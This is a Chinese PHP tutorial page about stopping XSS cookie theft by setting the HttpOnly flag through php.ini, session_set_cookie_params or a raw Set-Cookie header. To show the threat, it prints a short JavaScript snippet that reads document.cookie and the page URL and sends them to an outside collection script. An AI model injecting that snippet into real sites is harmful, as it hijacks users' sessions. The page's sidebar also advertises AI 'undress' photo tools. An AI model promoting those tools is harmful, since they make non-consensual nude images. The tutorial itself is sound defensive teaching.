社区
学习
工具库
AI工具
休闲
搜索
简体中文
首页 php教程 php手册 xss防御之php利用httponly防xss攻击

xss防御之php利用httponly防xss攻击

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jun 06, 2016 pm 08:23 PM
httponly xss攻击

这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下

xss的概念就不用多说了,,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

复制代码 代码如下:


url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly:

复制代码 代码如下:


//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过:

复制代码 代码如下:


header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是万能的!

本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

Video Face Swap

Video Face Swap

使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!

显示更多

热门文章

如何修复KB5055523无法在Windows 11中安装?
3 周前 By DDD
如何修复KB5055518无法在Windows 10中安装?
3 周前 By DDD
<🎜>:死铁路 - 如何驯服狼
4 周前 By DDD
R.E.P.O.的每个敌人和怪物的力量水平
4 周前 By 尊渡假赌尊渡假赌尊渡假赌
<🎜>:种植花园 - 完整的突变指南
2 周前 By DDD
显示更多

热工具

记事本++7.3.1

记事本++7.3.1

好用且免费的代码编辑器

SublimeText3汉化版

SublimeText3汉化版

中文版,非常好用

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

显示更多

热门话题

Java教程
1662
14
CakePHP 教程
1418
52
Laravel 教程
1311
25
PHP教程
1261
29
C# 教程
1234
24
显示更多
Related knowledge
如何使用PHP防御跨站脚本(XSS)攻击 如何使用PHP防御跨站脚本(XSS)攻击 Jun 29, 2023 am 10:46 AM

如何使用PHP防御跨站脚本(XSS)攻击随着互联网的快速发展,跨站脚本(Cross-SiteScripting,简称XSS)攻击是最常见的网络安全威胁之一。XSS攻击主要是通过在网页中注入恶意脚本,从而实现获取用户敏感信息、盗取用户账号等目的。为了保护用户数据的安全,开发人员应该采取适当的措施来防御XSS攻击。本文将介绍一些常用的PHP防御XSS攻击的技术

PHP数据过滤:预防XSS和CSRF攻击 PHP数据过滤:预防XSS和CSRF攻击 Jul 29, 2023 pm 03:33 PM

PHP数据过滤:预防XSS和CSRF攻击随着互联网的发展,网络安全成为人们关注的焦点之一。在网站开发中,对于用户提交的数据进行过滤和验证是非常重要的,尤其是预防XSS(跨站脚本攻击)和CSRF(跨站请求伪造攻击)攻击。本文将介绍如何使用PHP来防止这两种常见的安全漏洞,并提供一些示例代码供参考。预防XSS攻击XSS攻击是指恶意攻击者通过注入恶意脚本或代码来篡

XSS漏洞的工作原理是什么? XSS漏洞的工作原理是什么? Feb 19, 2024 pm 07:31 PM

XSS攻击原理是什么,需要具体代码示例随着互联网的普及和发展,Web应用程序的安全性逐渐成为人们关注的焦点。其中,跨站脚本攻击(Cross-SiteScripting,简称XSS)是一种常见的安全漏洞,对于Web开发人员而言必须要重视。XSS攻击是通过向Web页面注入恶意的脚本代码,从而在用户的浏览器中执行,这样攻击者就能控制用户的浏览器,获取用户的敏感信

如何在Java中设置HttpOnly Cookie? 如何在Java中设置HttpOnly Cookie? Apr 22, 2023 pm 06:37 PM

Httponlycookie是一种cookie安全解决方案。在支持httponlycookie的浏览器(IE6+、FF3.0+)中,如果cookie中设置了“httponly”属性,则JavaScript脚本将无法读取cookie信息,可以有效防止XSS攻击,让网站应用更安全。但是J2EE4、J2EE5cookie不提供设置httponly属性的方法,所以如果需要设置httponly属性需要自己处理。importjavax.servlet.http.Cookie;importjavax.serv

Codeql如何分析cookie未启用httponly的问题 Codeql如何分析cookie未启用httponly的问题 May 17, 2023 pm 05:25 PM

序今天我们利用codeql分析下“cookie未启用httponly“这类的安全问题,由此加深自己对codeql的使用。如果反应好的话,可以考虑把Vulnerability-goapp的其他漏洞也弄一弄。分析go程序时必须额外下载codeql-go说明审计对象Vulnerability-goapp:VulnerablegolangWebapplicationforeducation。修改因为该项目中的所有cookie均未设置http-only,没有对比性,所以我们先要对其修改。在一些cookie

您如何防止与会议有关的跨站点脚本(XSS)攻击? 您如何防止与会议有关的跨站点脚本(XSS)攻击? Apr 23, 2025 am 12:16 AM

要保护应用免受与会话相关的XSS攻击,需采取以下措施:1.设置HttpOnly和Secure标志保护会话cookie。2.对所有用户输入进行输出编码。3.实施内容安全策略(CSP)限制脚本来源。通过这些策略,可以有效防护会话相关的XSS攻击,确保用户数据安全。

Go语言中的跨站点脚本(XSS)攻击防范:最佳实践和技巧 Go语言中的跨站点脚本(XSS)攻击防范:最佳实践和技巧 Jun 17, 2023 pm 12:46 PM

随着互联网的快速发展,网站安全问题已经成为了网络世界中的一大难题。跨站点脚本(XSS)攻击是一种常见的安全漏洞,它利用网站的弱点,将恶意脚本注入到网页中,从而对用户的信息进行窃取和篡改。Go语言作为一种高效、安全的编程语言,为我们提供了强有力的防范XSS攻击的工具和技巧。本文将介绍一些最佳实践和技巧,帮助Go语言开发者有效地预防和解决XSS攻击。对所有输入进

Java开发中常见的网络安全问题及解决方法 Java开发中常见的网络安全问题及解决方法 Oct 09, 2023 pm 06:36 PM

Java开发中常见的网络安全问题及解决方法摘要:随着互联网的普及,网络安全问题日益凸显。在Java开发过程中,我们需要考虑如何保护网络通信的安全性。本篇文章将介绍一些常见的网络安全问题,并提供相应的解决方法和代码示例。一、跨站脚本攻击(XSS)XSS攻击是指通过将恶意脚本注入到网页中,获取用户敏感信息的一种攻击手段。为防止XSS攻击,我们可以使用常规的输入检

See all articles